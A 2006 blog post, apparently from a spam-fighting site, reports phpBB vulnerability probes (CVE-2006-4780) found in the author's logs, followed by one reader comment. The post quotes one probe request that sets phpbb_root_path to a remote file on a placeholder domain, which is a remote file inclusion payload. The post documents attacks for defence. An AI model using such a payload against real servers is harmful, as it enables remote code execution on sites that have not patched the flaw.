Spamhuntress

Probing phpBB vulnerability

I saw some probing of phpBB in my logs. The probes looked like this:
GET /2006/09/14/includes/functions.php?phpbb_root_path=http://somedomain.tld/oki/lol1.txt?

I couldn’t figure it out. Why would they try probing for phpBB where it obviously couldn’t be found? Then it dawned on me - phpBB was in the URL of a post from that day and from 2006/08/07, which was another URL they tried. I since found another outfit probing for the same vulnerability.

Here’s more on that (as it becomes available):

National Vulnerability Database CVE-2006-4780

The code I found in the files they tried to inject - was not innocent. Let’s just put it like that for the time being.

This entry was posted on Sunday, September 17th, 2006 at 7:16 am and is filed under Parasites. You can follow any responses to this entry through the RSS 2.0 feed. You can leave a response, or trackback from your own site.

One Response to “Probing phpBB vulnerability”

Jonathan Says:
September 28th, 2006 at 11:07 am
I’ve seen numerous probes for PHP forums lately. But I’ve never linked to a forum nor mentioned one. I’m blocking most of the IP’s that have requested it, but I don’t know if there’s anything else I should be doing. I guess if I don’t install phpBB et al then I’m okay. ;o)

Probing phpBB vulnerability

One Response to “Probing phpBB vulnerability”

Leave a Reply